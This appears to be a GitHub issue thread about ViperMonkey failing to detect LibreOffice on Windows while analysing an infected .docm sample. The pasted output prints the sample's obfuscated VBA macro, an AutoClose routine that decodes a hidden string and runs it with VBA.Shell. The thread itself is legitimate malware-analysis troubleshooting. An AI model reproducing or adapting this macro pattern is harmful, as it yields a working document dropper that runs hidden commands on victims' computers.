ViperMonkey icon indicating copy to clipboard operation
ViperMonkey copied to clipboard

Published 20 hours ago verified publisher icon decalage2

Vipermonkey says LibreOffice not installed, but it is

Open opticoax747 opened this issue 5 years ago • 4 comments

Running vipermonkey on flare-vm cygwin environment, trying to parse an infected .docm.

LibreOffice is installed, but Vipermonkey doesnt see it and errors out FILE: c:\Users\IEUser\Desktop\Files and PCAPs\f11b7237907275ca59ce4f0b630f69a6c3770b0060359917bf465690e2309e47 (1).docm INFO Starting emulation... INFO Emulating an Office (VBA) file. VBScript support is temporarily disabled in this version.

INFO Reading document metadata... WARNING Reading in metadata failed. Trying fallback. not an OLE2 structured storage file ERROR Cannot read metadata with exiftool. [Error 2] The system cannot find the file specified ERROR Reading in file as Excel with xlrd failed. ZIP file contents not a known type of workbook

ERROR Cannot convert Excel file with LibreOffice. LibreOffice not installed. INFO Saving dropped analysis artifacts in c:\Users\IEUser\Desktop\Files and PCAPs\f11b7237907275ca59ce4f0b630f69a6c3770b0060359917bf465690e2309e47 (1).docm_artifacts/ INFO Parsing VB... Error: [Errno 2] No such file or directory: u'word/vbaProject.bin'.

VBA MACRO ThisDocument.cls in file: word/vbaProject.bin - OLE stream: u'VBA/ThisDocument'

VBA CODE (with long lines collapsed):

Sub AutoClose() roans = Array("d", "J", "t", "s", "e", "A", "h", "0", "h", "j", "t", "s", "s", "V", "o", "q", "q", "n", "P", "5", "Z", "n", "9", "P", "L", "l", "n", "9", "5", "n", "t", "9", "h", "9", "A", "x", "E", "d", "q", "G", "Q", "q", "J", "d", "5", "0", "A", "V", "t", "V", "N", "L", "s", "d", "e", "X", "P", "E", "l", "P") totoro = ceraunogram(roans)

Application.Run "chillumchee", (totoro)

End Sub

Private Sub chillumchee(brothy)

declination = 6162 samoan = True

While samoan boneblack = declination + 222 If boneblack - declination > 111 Then VBA.Shell brothy, vbNormalFocus - 1 samoan = False End If

Wend

End Sub

Public Function trinely(germaneness, preludium)

russophobist = 9090 categoryator = -1 For Each drolled In preludium If drolled = germaneness Then russophobist = categoryator Exit For End If

categoryator = categoryator + 1

Next

If russophobist = 9090 Then russophobist = -1 End If

trinely = russophobist + 1 End Function

Private Function ceraunogram(roans) malope = Array("s", "P", "G", "q", "e", "d", "9", "Q", "x", "E", "j", "n", "N", "X", "t", "h", "L", "o", "V", "0", "A", "J", "Z", "5", "l") roughhoused = Array("t", "d", "N", "/", "a", "m", "w", "A", "c", "o", " ", "q", "?", "=", "h", "e", "u", ":", "p", "x", ".", "s", "j", "i", "n")

erasable = vbNullString

For Each paraphrenic In roans ore = Application.Run("trinely", paraphrenic, malope) If ore > -1 And ore < 8080 Then erasable = roughhoused(ore) + erasable End If Next

ceraunogram = StrReverse(erasable)

End Function

PARSING VBA CODE: INFO parsed Sub AutoClose (): 3 statement(s) INFO parsed Sub chillumchee ([ByRef brothy]): 3 statement(s) INFO parsed Function trinely ([ByRef germaneness, ByRef preludium]): 5 statement(s) INFO parsed Function ceraunogram ([ByRef roans]): 5 statement(s) INFO Reading document variables... INFO Reading Shapes object text fields... Traceback (most recent call last): File "vmonkey.py", line 1311, in _process_file shape_text = read_ole_fields._get_shapes_text_values(data, 'worddocument') File "c:\Users\IEUser\Desktop\ViperMonkey-master\ViperMonkey-master\vipermonkey\core\read_ole_fields.py", line 371, in _get_shapes_text_values r = _get_shapes_text_values_2007(fname) File "c:\Users\IEUser\Desktop\ViperMonkey-master\ViperMonkey-master\vipermonkey\core\read_ole_fields.py", line 223, in _get_shapes_text_values_2007 f = open(tmp_name, 'wb') IOError: [Errno 2] No such file or directory: '/tmp/9762170042.office' ERROR [Errno 2] No such file or directory: '/tmp/9762170042.office'

c:\Users\IEUser\Desktop\ViperMonkey-master\ViperMonkey-master\vipermonkey

opticoax747 avatar Dec 23 '19 17:12 opticoax747

I think for now the call to LibreOffice only works on Linux. Usually on Windows it displays an error but does not stop. I'll have a look.

decalage2 avatar Jan 02 '20 09:01 decalage2

ok, i will try to get a licensed version of Word on Windows? Would that be better?

opticoax747 avatar Jan 08 '20 10:01 opticoax747

No no, I just meant the code in ViperMonkey which deals with LibreOffice is only designed to work on Linux, because it uses paths like /tmp (see the error message you pasted above). What we need to do (if somebody has time), is to improve the code so that it can work with LibreOffice on Windows too.

decalage2 avatar Jan 08 '20 11:01 decalage2

I did hardcode the path to Windows Libre Office into the .py, but it still errored out.

I think my office will give me a Word license...

opticoax747 avatar Jan 08 '20 12:01 opticoax747